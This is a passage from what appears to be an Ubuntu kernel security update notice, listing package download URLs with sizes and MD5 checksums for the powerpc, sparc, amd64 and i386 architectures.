http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    85854 59c8914383ae0624690950d8f844c101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115790 ac0661102201e3f682eda1052d987671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   149304 958f0b630326763cddddce5503f3319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5:   773010 979da22c264d122841ea140319b365ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
  Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5: 15017856 479231852577fdd0e402556287a02059
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   163276 481deef18ee50e039791747737619c3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
  Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
  Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
  Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
  Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
  Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
  Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   145458 3e087634d61556643c32e342214a0642
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
  Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    26794 50bb7020338de7d00265de0765578291
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32672 7135f346092b651dafed111b91aee44d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    47602 e55422dc48484675642c96bdbc673595
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
